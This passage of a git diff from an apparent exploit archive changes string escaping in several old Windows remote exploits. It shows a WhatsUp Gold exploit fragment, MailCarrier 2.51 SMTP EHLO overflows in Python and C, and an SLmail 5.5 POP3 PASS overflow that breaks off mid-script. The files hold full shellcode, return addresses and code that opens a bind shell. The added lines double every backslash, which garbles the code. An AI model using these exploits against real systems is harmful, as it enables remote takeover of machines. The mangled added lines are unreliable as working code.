-print "\nUsage: NotmuchG.pl [host] [port]\n"; 
-print "[host] Target host\n[port] WhatsUp webserver port\n\n"; 
-print "\n Shell on tcp port 28876.\n\n"; 
-print "ET LoWNOISE 2004\n";
+print \"\\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\\n\";
+print \"===================================================\\n\";
+print \"\\nUsage: NotmuchG.pl [host] [port]\\n\"; 
+print \"[host] Target host\\n[port] WhatsUp webserver port\\n\\n\"; 
+print \"\\n Shell on tcp port 28876.\\n\\n\"; 
+print \"ET LoWNOISE 2004\\n\";
 exit(1); 
 }
 
diff --git a/platforms/windows/remote/598.py b/platforms/windows/remote/598.py
index bcd8ab32d..d52b0be63 100755
--- a/platforms/windows/remote/598.py
+++ b/platforms/windows/remote/598.py
@@ -3,65 +3,65 @@
 # Advanced, secure and easy to use FTP Server. 	    	#
 # 23 Oct 2004 - muts                                	#
 #########################################################
-# D:\BO>mailcarrier-2.5-EHLO.py                       	#
+# D:\\BO>mailcarrier-2.5-EHLO.py                       	#
 #########################################################
-# D:\data\tools>nc -v 192.168.1.32 101			#
+# D:\\data\\tools>nc -v 192.168.1.32 101			#
 # localhost [127.0.0.1] 101 (hostname) open		#
 # Microsoft Windows 2000 [Version 5.00.2195]		#
 # (C) Copyright 1985-2000 Microsoft Corp.		#
-# C:\WINNT\system32>					#
+# C:\\WINNT\\system32>					#
 #########################################################
 
 import struct
 import socket
 
-print "\n\n###############################################"
-print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
-print "\nFound & coded by muts [at] whitehat.co.il"
-print "\nFor Educational Purposes Only!\n" 
-print "\n\n###############################################"
+print \"\\n\\n###############################################\"
+print \"\\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow\"
+print \"\\nFound & coded by muts [at] whitehat.co.il\"
+print \"\\nFor Educational Purposes Only!\\n\" 
+print \"\\n\\n###############################################\"
 
 def make_overflow_dummy(overflow_len, retaddr):
-    return 'A' * overflow_len + struct.pack('<L', retaddr)
+    return \'A\' * overflow_len + struct.pack(\'<L\', retaddr)
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
-sc2 = "\xEB"
-sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
-sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
-sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
-sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
-sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
-sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
-sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
-sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
-sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
-sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
-sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
-sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
-sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
-sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
-sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
-sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
-sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
-sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
-sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
-sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
-sc2 += "\x58\x68\x61\x63\x6B\x90"
+sc2 = \"\\xEB\"
+sc2 += \"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"
+sc2 += \"\\xFF\\x60\\xDE\\x88\\x88\\x88\\xDB\\xDD\\xDE\\xDF\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\"
+sc2 += \"\\xF0\\x89\\x62\\x03\\xC2\\x90\\x03\\xD2\\xA8\\x89\\x63\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x89\\x66\\xB9\"
+sc2 += \"\\x77\\x74\\xB9\\x48\\x24\\xB0\\x68\\xFC\\x8F\\x49\\x47\\x85\\x89\\x4F\\x63\\x7A\\xB3\\xF4\\xAC\\x9C\"
+sc2 += \"\\xFD\\x69\\x03\\xD2\\xAC\\x89\\x63\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\\x89\\x63\\x03\\x8C\\x03\\x89\"
+sc2 += \"\\x60\\x63\\x8A\\xB9\\x48\\xD7\\xD6\\xD5\\xD3\\x4A\\x80\\x88\\xD6\\xE2\\xB8\\xD1\\xEC\\x03\\x91\\x03\"
+sc2 += \"\\xD3\\x84\\x03\\xD3\\x94\\x03\\x93\\x03\\xD3\\x80\\xDB\\xE0\\x06\\xC6\\x86\\x64\\x77\\x5E\\x01\\x4F\"
+sc2 += \"\\x09\\x64\\x88\\x89\\x88\\x88\\xDF\\xDE\\xDB\\x01\\x6D\\x60\\xAF\\x88\\x88\\x88\\x18\\x89\\x88\\x88\"
+sc2 += \"\\x3E\\x91\\x90\\x6F\\x2C\\x91\\xF8\\x61\\x6D\\xC1\\x0E\\xC1\\x2C\\x92\\xF8\\x4F\\x2C\\x25\\xA6\\x61\"
+sc2 += \"\\x51\\x81\\x7D\\x25\\x43\\x65\\x74\\xB3\\xDF\\xDB\\xBA\\xD7\\xBB\\xBA\\x88\\xD3\\x05\\xC3\\xA8\\xD9\"
+sc2 += \"\\x77\\x5F\\x01\\x57\\x01\\x4B\\x05\\xFD\\x9C\\xE2\\x8F\\xD1\\xD9\\xDB\\x77\\xBC\\x07\\x77\\xDD\\x8C\"
+sc2 += \"\\xD1\\x01\\x8C\\x06\\x6A\\x7A\\xA3\\xAF\\xDC\\x77\\xBF\\x77\\xDD\\xB8\\xB9\\x48\\xD8\\xD8\\xD8\\xD8\"
+sc2 += \"\\xC8\\xD8\\xC8\\xD8\\x77\\xDD\\xA4\\x01\\x4F\\xB9\\x53\\xDB\\xDB\\xE0\\x8A\\x88\\x88\\xED\\x01\\x68\"
+sc2 += \"\\xE2\\x98\\xD8\\xDF\\x77\\xDD\\xAC\\xDB\\xDF\\x77\\xDD\\xA0\\xDB\\xDC\\xDF\\x77\\xDD\\xA8\\x01\\x4F\"
+sc2 += \"\\xE0\\xCB\\xC5\\xCC\\x88\\x01\\x6B\\x0F\\x72\\xB9\\x48\\x05\\xF4\\xAC\\x24\\xE2\\x9D\\xD1\\x7B\\x23\"
+sc2 += \"\\x0F\\x72\\x09\\x64\\xDC\\x88\\x88\\x88\\x4E\\xCC\\xAC\\x98\\xCC\\xEE\\x4F\\xCC\\xAC\\xB4\\x89\\x89\"
+sc2 += \"\\x01\\xF4\\xAC\\xC0\\x01\\xF4\\xAC\\xC4\\x01\\xF4\\xAC\\xD8\\x05\\xCC\\xAC\\x98\\xDC\\xD8\\xD9\\xD9\"
+sc2 += \"\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\xDB\\xD9\\x77\\xFD\\x88\\xE0\\xFA\\x76\\x3B\\x9E\\x77\\xDD\\x8C\\x77\"
+sc2 += \"\\x58\\x01\\x6E\\x77\\xFD\\x88\\xE0\\x25\\x51\\x8D\\x46\\x77\\xDD\\x8C\\x01\\x4B\\xE0\\x77\\x77\\x77\"
+sc2 += \"\\x77\\x77\\xBE\\x77\\x5B\\x77\\xFD\\x88\\xE0\\xF6\\x50\\x6A\\xFB\\x77\\xDD\\x8C\\xB9\\x53\\xDB\\x77\"
+sc2 += \"\\x58\\x68\\x61\\x63\\x6B\\x90\"
 
 # Change RET address as need be.
 
-#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2  # RET Win2000 SP4 ENG
-buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x90' * 32 + sc2  #RET WinXP SP2 ENG
+#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + \'\\x90\' * 32 + sc2  # RET Win2000 SP4 ENG
+buffer = make_overflow_dummy(5097, 0x7d17dd13) + \'\\x90\' * 32 + sc2  #RET WinXP SP2 ENG
 
 try:
-	print "\nSending evil buffer..."
-	s.connect(('127.0.0.1',25))
-	s.send('EHLO ' + buffer + '\r\n')
+	print \"\\nSending evil buffer...\"
+	s.connect((\'127.0.0.1\',25))
+	s.send(\'EHLO \' + buffer + \'\\r\\n\')
 	data = s.recv(1024)
 	s.close()
-	print "\nDone! Try connecting to port 101 on victim machine."
+	print \"\\nDone! Try connecting to port 101 on victim machine.\"
 except:
-	print "Could not connect to SMTP!"
+	print \"Could not connect to SMTP!\"
 
 # milw0rm.com [2004-10-26]
diff --git a/platforms/windows/remote/637.c b/platforms/windows/remote/637.c
index 71dc9dd0b..557b6b5d4 100755
--- a/platforms/windows/remote/637.c
+++ b/platforms/windows/remote/637.c
@@ -11,7 +11,7 @@ no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
 Microsoft Windows 2000 [Version 5.00.2195]
 (C) Copyright 1985-2000 Microsoft Corp.
 
-C:\WINNT\system32>
+C:\\WINNT\\system32>
 
 Greets to NtWaK0,schap,kane,kamalo,foufs :P
 */
@@ -28,34 +28,34 @@ Greets to NtWaK0,schap,kane,kamalo,foufs :P
 
 #define PORT 25
 #define RPORT 31337
-#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
+#define RET \"\\xD3\\x39\\xD3\\x77\" /*win2k adv server sp4*/
 
 char shellcode[] =
-"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x81"
-"\x59\x47\x83\xeb\xfc\xe2\xf4\xb1\x69\x0f\x47\x4d\x81\x0a\x12\x1b"
-"\xd6\xd2\x2b\x69\x99\xd2\x02\x71\x0a\x0d\x42\x35\x80\xb3\xcc\x07"
-"\x99\xd2\x1d\x6d\x80\xb2\xa4\x7f\xc8\xd2\x73\xc6\x80\xb7\x76\xb2"
-"\x7d\x68\x87\xe1\xb9\xb9\x33\x4a\x40\x96\x4a\x4c\x46\xb2\xb5\x76"
-"\xfd\x7d\x53\x38\x60\xd2\x1d\x69\x80\xb2\x21\xc6\x8d\x12\xcc\x17"
-"\x9d\x58\xac\xc6\x85\xd2\x46\xa5\x6a\x5b\x76\x8d\xde\x07\x1a\x16"
-"\x43\x51\x47\x13\xeb\x69\x1e\x29\x0a\x40\xcc\x16\x8d\xd2\x1c\x51"
-"\x0a\x42\xcc\x16\x89\x0a\x2f\xc3\xcf\x57\xab\xb2\x57\xd0\x80\xcc"
-"\x6d\x59\x46\x4d\x81\x0e\x11\x1e\x08\xbc\xaf\x6a\x81\x59\x47\xdd"
-"\x80\x59\x47\xfb\x98\x41\xa0\xe9\x98\x29\xae\xa8\xc8\xdf\x0e\xe9"
-"\x9b\x29\x80\xe9\x2c\x77\xae\x94\x88\xac\xea\x86\x6c\xa5\x7c\x1a"
-"\xd2\x6b\x18\x7e\xb3\x59\x1c\xc0\xca\x79\x16\xb2\x56\xd0\x98\xc4"
-"\x42\xd4\x32\x59\xeb\x5e\x1e\x1c\xd2\xa6\x73\xc2\x7e\x0c\x43\x14"
-"\x08\x5d\xc9\xaf\x73\x72\x60\x19\x7e\x6e\xb8\x18\xb1\x68\x87\x1d"
-"\xd1\x09\x17\x0d\xd1\x19\x17\xb2\xd4\x75\xce\x8a\xb0\x82\x14\x1e"
-"\xe9\x5b\x47\x37\xe8\xd0\xa7\x27\x91\x09\x10\xb2\xd4\x7d\x14\x1a"
-"\x7e\x0c\x6f\x1e\xd5\x0e\xb8\x18\xa1\xd0\x80\x25\xc2\x14\x03\x4d"
-"\x08\xba\xc0\xb7\xb0\x99\xca\x31\xa5\xf5\x2d\x58\xd8\xaa\xec\xca"
-"\x7b\xda\xab\x19\x47\x1d\x63\x5d\xc5\x3f\x80\x09\xa5\x65\x46\x4c"
-"\x08\x25\x63\x05\x08\x25\x63\x01\x08\x25\x63\x1d\x0c\x1d\x63\x5d"
-"\xd5\x09\x16\x1c\xd0\x18\x16\x04\xd0\x08\x14\x1c\x7e\x2c\x47\x25"
-"\xf3\xa7\xf4\x5b\x7e\x0c\x43\xb2\x51\xd0\xa1\xb2\xf4\x59\x2f\xe0"
-"\x58\x5c\x89\xb2\xd4\x5d\xce\x8e\xeb\xa6\xb8\x7b\x7e\x8a\xb8\x38"
-"\x81\x31\xb7\xc7\x85\x06\xb8\x18\x85\x68\x9c\x1e\x7e\x89\x47";
+\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x4d\\x81\"
+\"\\x59\\x47\\x83\\xeb\\xfc\\xe2\\xf4\\xb1\\x69\\x0f\\x47\\x4d\\x81\\x0a\\x12\\x1b\"
+\"\\xd6\\xd2\\x2b\\x69\\x99\\xd2\\x02\\x71\\x0a\\x0d\\x42\\x35\\x80\\xb3\\xcc\\x07\"
+\"\\x99\\xd2\\x1d\\x6d\\x80\\xb2\\xa4\\x7f\\xc8\\xd2\\x73\\xc6\\x80\\xb7\\x76\\xb2\"
+\"\\x7d\\x68\\x87\\xe1\\xb9\\xb9\\x33\\x4a\\x40\\x96\\x4a\\x4c\\x46\\xb2\\xb5\\x76\"
+\"\\xfd\\x7d\\x53\\x38\\x60\\xd2\\x1d\\x69\\x80\\xb2\\x21\\xc6\\x8d\\x12\\xcc\\x17\"
+\"\\x9d\\x58\\xac\\xc6\\x85\\xd2\\x46\\xa5\\x6a\\x5b\\x76\\x8d\\xde\\x07\\x1a\\x16\"
+\"\\x43\\x51\\x47\\x13\\xeb\\x69\\x1e\\x29\\x0a\\x40\\xcc\\x16\\x8d\\xd2\\x1c\\x51\"
+\"\\x0a\\x42\\xcc\\x16\\x89\\x0a\\x2f\\xc3\\xcf\\x57\\xab\\xb2\\x57\\xd0\\x80\\xcc\"
+\"\\x6d\\x59\\x46\\x4d\\x81\\x0e\\x11\\x1e\\x08\\xbc\\xaf\\x6a\\x81\\x59\\x47\\xdd\"
+\"\\x80\\x59\\x47\\xfb\\x98\\x41\\xa0\\xe9\\x98\\x29\\xae\\xa8\\xc8\\xdf\\x0e\\xe9\"
+\"\\x9b\\x29\\x80\\xe9\\x2c\\x77\\xae\\x94\\x88\\xac\\xea\\x86\\x6c\\xa5\\x7c\\x1a\"
+\"\\xd2\\x6b\\x18\\x7e\\xb3\\x59\\x1c\\xc0\\xca\\x79\\x16\\xb2\\x56\\xd0\\x98\\xc4\"
+\"\\x42\\xd4\\x32\\x59\\xeb\\x5e\\x1e\\x1c\\xd2\\xa6\\x73\\xc2\\x7e\\x0c\\x43\\x14\"
+\"\\x08\\x5d\\xc9\\xaf\\x73\\x72\\x60\\x19\\x7e\\x6e\\xb8\\x18\\xb1\\x68\\x87\\x1d\"
+\"\\xd1\\x09\\x17\\x0d\\xd1\\x19\\x17\\xb2\\xd4\\x75\\xce\\x8a\\xb0\\x82\\x14\\x1e\"
+\"\\xe9\\x5b\\x47\\x37\\xe8\\xd0\\xa7\\x27\\x91\\x09\\x10\\xb2\\xd4\\x7d\\x14\\x1a\"
+\"\\x7e\\x0c\\x6f\\x1e\\xd5\\x0e\\xb8\\x18\\xa1\\xd0\\x80\\x25\\xc2\\x14\\x03\\x4d\"
+\"\\x08\\xba\\xc0\\xb7\\xb0\\x99\\xca\\x31\\xa5\\xf5\\x2d\\x58\\xd8\\xaa\\xec\\xca\"
+\"\\x7b\\xda\\xab\\x19\\x47\\x1d\\x63\\x5d\\xc5\\x3f\\x80\\x09\\xa5\\x65\\x46\\x4c\"
+\"\\x08\\x25\\x63\\x05\\x08\\x25\\x63\\x01\\x08\\x25\\x63\\x1d\\x0c\\x1d\\x63\\x5d\"
+\"\\xd5\\x09\\x16\\x1c\\xd0\\x18\\x16\\x04\\xd0\\x08\\x14\\x1c\\x7e\\x2c\\x47\\x25\"
+\"\\xf3\\xa7\\xf4\\x5b\\x7e\\x0c\\x43\\xb2\\x51\\xd0\\xa1\\xb2\\xf4\\x59\\x2f\\xe0\"
+\"\\x58\\x5c\\x89\\xb2\\xd4\\x5d\\xce\\x8e\\xeb\\xa6\\xb8\\x7b\\x7e\\x8a\\xb8\\x38\"
+\"\\x81\\x31\\xb7\\xc7\\x85\\x06\\xb8\\x18\\x85\\x68\\x9c\\x1e\\x7e\\x89\\x47\";
 
 
 struct sockaddr_in hrm,lar;
@@ -75,10 +75,10 @@ void shell(int sock)
   if( FD_ISSET(sock, &fd_read) ) {
    n=read(sock,buff,sizeof(buff));
    if (n == 0) {
-       printf ("Connection closed.\n");
+       printf (\"Connection closed.\\n\");
        exit(EXIT_FAILURE);
    } else if (n < 0) {
-       perror("read remote");
+       perror(\"read remote\");
        exit(EXIT_FAILURE);
    }
    write(1,buff,n);
@@ -86,7 +86,7 @@ void shell(int sock)
  
   if ( FD_ISSET(0, &fd_read) ) {
     if((n=read(0,buff,sizeof(buff)))<=0){
-      perror ("read user");
+      perror (\"read user\");
       exit(EXIT_FAILURE);
     }
     write(sock,buff,n);
@@ -104,10 +104,10 @@ int conn(char *ip,int port)
 	sockfd = socket(AF_INET,SOCK_STREAM,0);
 if((connect(sockfd,(struct sockaddr *)&hrm,sizeof(struct sockaddr))) < 0)
 	{
-	perror("connect");
+	perror(\"connect\");
 	exit(0);
 	}
-	printf("[x] Connected to: %s PORT: %d\n",ip,port);
+	printf(\"[x] Connected to: %s PORT: %d\\n\",ip,port);
 	return sockfd;
 }
 
@@ -117,31 +117,31 @@ int main(int argc, char *argv[])
 	int x,y;
 	if(argc<2)
 	{
-	printf("Usage: TargetIP.\n");
+	printf(\"Usage: TargetIP.\\n\");
 	exit(0);
 	}
-	printf("**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\n");
+	printf(\"**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\\n\");
 	t=argv[1];
-	memset(buffer,'\0',5530);
+	memset(buffer,\'\\0\',5530);
 	memset(crap,0x41,32);
 	memset(buffer,0x90,5095);
 	strcat(buffer,RET);
 	strcat(buffer,crap);
 	strcat(buffer,shellcode);
 	x = conn(t,PORT);
-	printf("[x] Sending evil buffer..");
+	printf(\"[x] Sending evil buffer..\");
 	sleep(3);
-	write(x,"EHLO ",5);
+	write(x,\"EHLO \",5);
 	sleep(1);
 	write(x,buffer,5530);
-	write(x,"\r\n\r\n",4);
+	write(x,\"\\r\\n\\r\\n\",4);
 	sleep(2);
 	close(x);
-	printf("done.\n");
-	printf("[x] Trying to connect to port 31337..\n");
+	printf(\"done.\\n\");
+	printf(\"[x] Trying to connect to port 31337..\\n\");
 	y = conn(t,RPORT);
-	printf("[x] 0wn3d!\n");
-	printf("\r\n");
+	printf(\"[x] 0wn3d!\\n\");
+	printf(\"\\r\\n\");
 	shell(y);
 		
 }
diff --git a/platforms/windows/remote/638.py b/platforms/windows/remote/638.py
index 197a67517..e2129e297 100755
--- a/platforms/windows/remote/638.py
+++ b/platforms/windows/remote/638.py
@@ -7,67 +7,67 @@
 # Plain vanilla stack overflow in the PASS command  	#
 #                                                       #
 #########################################################
-# D:\Projects\BO>SLmail-5.5-POP3-PASS.py                #
+# D:\\Projects\\BO>SLmail-5.5-POP3-PASS.py                #
 #########################################################
-# D:\Projects\BO>nc -v 192.168.1.167 4444               #
+# D:\\Projects\\BO>nc -v 192.168.1.167 4444               #
 # localhost.lan [192.168.1.167] 4444 (?) open           #   
 # Microsoft Windows 2000 [Version 5.00.2195]            #
 # (C) Copyright 1985-2000 Microsoft Corp.               #
-# C:\Program Files\SLmail\System>                       #
+# C:\\Program Files\\SLmail\\System>                       #
 #########################################################
 
 import struct
 import socket
 
-print "\n\n###############################################"
-print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
-print "\nFound & coded by muts [at] offsec.com"
-print "\nFor Educational Purposes Only!" 
-print "\n\n###############################################"
+print \"\\n\\n###############################################\"
+print \"\\nSLmail 5.5 POP3 PASS Buffer Overflow\"
+print \"\\nFound & coded by muts [at] offsec.com\"
+print \"\\nFor Educational Purposes Only!\" 
+print \"\\n\\n###############################################\"
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 
-sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
-sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
-sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
-sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
-sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
-sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
-sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
-sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
-sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
-sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
-sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
-sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
-sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
-sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
-sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
-sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
-sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
-sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
-sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
-sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
-sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
-sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
-sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
-sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
-sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
+sc = \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\xe0\\x66\"
+sc += \"\\x1c\\xc2\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x8e\\x4a\\xc2\\xe0\\x66\\x4f\\x97\\xb6\"
+sc += \"\\x31\\x97\\xae\\xc4\\x7e\\x97\\x87\\xdc\\xed\\x48\\xc7\\x98\\x67\\xf6\\x49\\xaa\"
+sc += \"\\x7e\\x97\\x98\\xc0\\x67\\xf7\\x21\\xd2\\x2f\\x97\\xf6\\x6b\\x67\\xf2\\xf3\\x1f\"
+sc += \"\\x9a\\x2d\\x02\\x4c\\x5e\\xfc\\xb6\\xe7\\xa7\\xd3\\xcf\\xe1\\xa1\\xf7\\x30\\xdb\"
+sc += \"\\x1a\\x38\\xd6\\x95\\x87\\x97\\x98\\xc4\\x67\\xf7\\xa4\\x6b\\x6a\\x57\\x49\\xba\"
+sc += \"\\x7a\\x1d\\x29\\x6b\\x62\\x97\\xc3\\x08\\x8d\\x1e\\xf3\\x20\\x39\\x42\\x9f\\xbb\"
+sc += \"\\xa4\\x14\\xc2\\xbe\\x0c\\x2c\\x9b\\x84\\xed\\x05\\x49\\xbb\\x6a\\x97\\x99\\xfc\"
+sc += \"\\xed\\x07\\x49\\xbb\\x6e\\x4f\\xaa\\x6e\\x28\\x12\\x2e\\x1f\\xb0\\x95\\x05\\x61\"
+sc += \"\\x8a\\x1c\\xc3\\xe0\\x66\\x4b\\x94\\xb3\\xef\\xf9\\x2a\\xc7\\x66\\x1c\\xc2\\x70\"
+sc += \"\\x67\\x1c\\xc2\\x56\\x7f\\x04\\x25\\x44\\x7f\\x6c\\x2b\\x05\\x2f\\x9a\\x8b\\x44\"
+sc += \"\\x7c\\x6c\\x05\\x44\\xcb\\x32\\x2b\\x39\\x6f\\xe9\\x6f\\x2b\\x8b\\xe0\\xf9\\xb7\"
+sc += \"\\x35\\x2e\\x9d\\xd3\\x54\\x1c\\x99\\x6d\\x2d\\x3c\\x93\\x1f\\xb1\\x95\\x1d\\x69\"
+sc += \"\\xa5\\x91\\xb7\\xf4\\x0c\\x1b\\x9b\\xb1\\x35\\xe3\\xf6\\x6f\\x99\\x49\\xc6\\xb9\"
+sc += \"\\xef\\x18\\x4c\\x02\\x94\\x37\\xe5\\xb4\\x99\\x2b\\x3d\\xb5\\x56\\x2d\\x02\\xb0\"
+sc += \"\\x36\\x4c\\x92\\xa0\\x36\\x5c\\x92\\x1f\\x33\\x30\\x4b\\x27\\x57\\xc7\\x91\\xb3\"
+sc += \"\\x0e\\x1e\\xc2\\xf1\\x3a\\x95\\x22\\x8a\\x76\\x4c\\x95\\x1f\\x33\\x38\\x91\\xb7\"
+sc += \"\\x99\\x49\\xea\\xb3\\x32\\x4b\\x3d\\xb5\\x46\\x95\\x05\\x88\\x25\\x51\\x86\\xe0\"
+sc += \"\\xef\\xff\\x45\\x1a\\x57\\xdc\\x4f\\x9c\\x42\\xb0\\xa8\\xf5\\x3f\\xef\\x69\\x67\"
+sc += \"\\x9c\\x9f\\x2e\\xb4\\xa0\\x58\\xe6\\xf0\\x22\\x7a\\x05\\xa4\\x42\\x20\\xc3\\xe1\"
+sc += \"\\xef\\x60\\xe6\\xa8\\xef\\x60\\xe6\\xac\\xef\\x60\\xe6\\xb0\\xeb\\x58\\xe6\\xf0\"
+sc += \"\\x32\\x4c\\x93\\xb1\\x37\\x5d\\x93\\xa9\\x37\\x4d\\x91\\xb1\\x99\\x69\\xc2\\x88\"
+sc += \"\\x14\\xe2\\x71\\xf6\\x99\\x49\\xc6\\x1f\\xb6\\x95\\x24\\x1f\\x13\\x1c\\xaa\\x4d\"
+sc += \"\\xbf\\x19\\x0c\\x1f\\x33\\x18\\x4b\\x23\\x0c\\xe3\\x3d\\xd6\\x99\\xcf\\x3d\\x95\"
+sc += \"\\x66\\x74\\x32\\x6a\\x62\\x43\\x3d\\xb5\\x62\\x2d\\x19\\xb3\\x99\\xcc\\xc2\"
 
 #Tested on Win2k SP4 Unpatched
 # Change ret address if needed
-buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc 
+buffer = \'\\x41\' * 4654 + struct.pack(\'<L\', 0x783d6ddf) + \'\\x90\'*32 + sc 
 try:
-	print "\nSending evil buffer..."
-	s.connect(('192.168.1.167',110))
